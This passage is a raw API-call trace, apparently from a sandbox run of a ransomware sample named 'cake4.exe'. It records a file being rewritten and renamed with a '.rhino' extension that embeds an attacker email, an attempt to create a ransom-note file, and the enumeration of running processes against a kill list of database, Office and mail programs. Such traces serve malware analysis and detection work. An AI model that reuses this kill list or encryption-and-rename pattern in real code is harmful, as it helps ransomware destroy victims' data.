HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.415] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0083.415] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0083.415] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0083.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0083.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0083.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0083.416] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0083.416] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0083.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0083.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0083.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0083.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0083.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0083.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0083.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0083.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0083.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0083.566] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0083.566] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x75b0d8 [0083.566] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0083.566] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b0d8 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x75a5f8 [0083.566] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0083.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x717898 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75a5f8 | out: hHeap=0x6d0000) returned 1 [0083.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7186b0 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717898 | out: hHeap=0x6d0000) returned 1 [0083.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x6ee498 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7186b0 | out: hHeap=0x6d0000) returned 1 [0083.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x2230048 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0083.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x2232fe0 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.567] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x2237730 [0083.567] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2232fe0 | out: hHeap=0x6d0000) returned 1 [0083.571] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x223e210 [0083.573] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2237730 | out: hHeap=0x6d0000) returned 1 [0083.573] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x7630c0 [0083.576] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x223e210 | out: hHeap=0x6d0000) returned 1 [0083.577] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x2230048 [0083.578] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7630c0 | out: hHeap=0x6d0000) returned 1 [0083.578] WriteFile (in: hFile=0x124, lpBuffer=0x2230060*, nNumberOfBytesToWrite=0x15a10, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x2230060*, lpNumberOfBytesWritten=0x4af2ac*=0x15a10, lpOverlapped=0x0) returned 1 [0083.579] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2230048 | out: hHeap=0x6d0000) returned 1 [0083.579] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15a10, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0083.579] CloseHandle (hObject=0x124) returned 1 [0083.580] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fac68 [0083.580] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0083.580] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fac68 | out: hHeap=0x6d0000) returned 1 [0083.580] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zPsVUyevGQ4FW.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zpsvuyevgq4fw.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zPsVUyevGQ4FW.m4a.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zpsvuyevgq4fw.m4a.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0083.581] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0083.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0083.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0083.582] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eba00 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0083.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eba00 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9368 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721a28 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5ec8 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5f50 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7073c0 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e93f0 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709810 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709888 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705af0 | out: hHeap=0x6d0000) returned 1 [0083.582] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703920 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705b78 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7039a8 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70aa90 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edb90 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ab38 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edc38 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703a20 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edcd0 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edd48 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb648 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fa998 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb6d0 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e95c0 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f3798 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f3840 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9678 | out: hHeap=0x6d0000) returned 1 [0083.583] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f77f8 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa10 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb758 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb7e0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb5c0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f78a0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb868 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f7938 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6faa88 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f79d0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fab00 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb978 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fab78 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7132a0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71f9f0 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713c08 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5700 | out: hHeap=0x6d0000) returned 1 [0083.584] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x3110020 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703200 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713158 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715718 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703868 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e94a0 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715770 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9508 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f1e78 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f1ed0 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7219d0 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6810 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6868 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713898 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713988 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713c58 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715010 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713ca8 | out: hHeap=0x6d0000) returned 1 [0083.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715048 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edf10 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702448 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7025d0 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7024f0 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e1568 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6918 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7277e8 | out: hHeap=0x6d0000) returned 1 [0083.776] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f68c0 | out: hHeap=0x6d0000) returned 1 [0083.776] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x6e9368 [0083.776] GetCurrentProcess () returned 0xffffffff [0083.776] GetModuleBaseNameA (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x6e9368, nSize=0x104 | out: lpBaseName="cake4.exe") returned 0x9 [0083.776] RtlTryEnterCriticalSection (CriticalSection=0x28e05c) returned 1 [0083.777] lstrcmpA (lpString1="cake4.exe", lpString2="mhtop32bit.exe") returned -1 [0083.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9368 | out: hHeap=0x6d0000) returned 1 [0083.777] GetModuleHandleW (lpModuleName=0x0) returned 0x200000 [0083.777] GetModuleHandleW (lpModuleName=0x0) returned 0x200000 [0083.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713cd0 | out: hHeap=0x6d0000) returned 1 [0083.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fa8 | out: hHeap=0x6d0000) returned 1 [0083.777] CryptReleaseContext (hProv=0x707338, dwFlags=0x0) returned 1 [0083.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5710 | out: hHeap=0x6d0000) returned 1 [0083.777] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8218 | out: hHeap=0x6d0000) returned 1 [0083.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9038 | out: hHeap=0x6d0000) returned 1 [0083.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709628 | out: hHeap=0x6d0000) returned 1 [0083.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8240 | out: hHeap=0x6d0000) returned 1 [0083.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709680 | out: hHeap=0x6d0000) returned 1 [0083.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8c68 | out: hHeap=0x6d0000) returned 1 [0083.930] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7818 | out: hHeap=0x6d0000) returned 1 [0083.930] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.930] GetLastError () returned 0x57 [0083.930] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0083.932] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0083.932] GetLastError () returned 0x57 [0083.932] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0083.935] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x4af760 | out: phModule=0x4af760) returned 0 [0083.935] ExitProcess (uExitCode=0x0) [0083.937] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e4a10 | out: hHeap=0x6d0000) returned 1 Thread: id = 17 os_tid = 0x9d4 [0055.035] GetCurrentThread () returned 0xfffffffe [0055.035] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0055.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0055.967] Process32FirstW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="SearchIndexer.exesqlservr.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="msftesql.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="sqlagent.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="sqlwriter.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="oracle.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="ocssd.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="dbsnmp.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="synctime.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="mydesktopqos.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvc.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="isqlpplussvc.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="isqlpussvc.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="xfssvccon.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="mydesktopservice.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="ocautoupds.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="encsvc.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="firefoxconfig.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="tbirdconfig.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="ocomm.exe") returned -1 [0055.968] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld-nt") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="mysqld-opt") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="dbeng50.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="sqbcoreservice.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="excel.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="infopath.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="msaccess.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="mspub.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="onenote.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="outlook.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="powerpnt.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="stream.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="thebat.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="thebat64.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="Thunderbird.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="visio.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="winword.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="wordpad.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="sqlwb.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="sqlbrowser.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcagntsvc.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcencsvc.exe") returned -1 [0055.969] lstrcmpiW (lpString1="[System Process]", lpString2="agntsvcisqlplussvc.exe") returned -1 [0055.969] Process32NextW (in: hSnapshot=0x130, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="SearchIndexer.exesqlservr.exe") returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="msftesql.exe") returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="sqlagent.exe") returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="sqlwriter.exe") returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="oracle.exe") returned 1 [0055.970] lstrcmpiW (lpString1="System", lpString2="ocssd.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="dbsnmp.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="synctime.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="mydesktopqos.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="agntsvc.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="isqlpplussvc.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", lpString2="isqlpussvc.exe") returned 1 [0055.971] lstrcmpiW (lpString1="System", 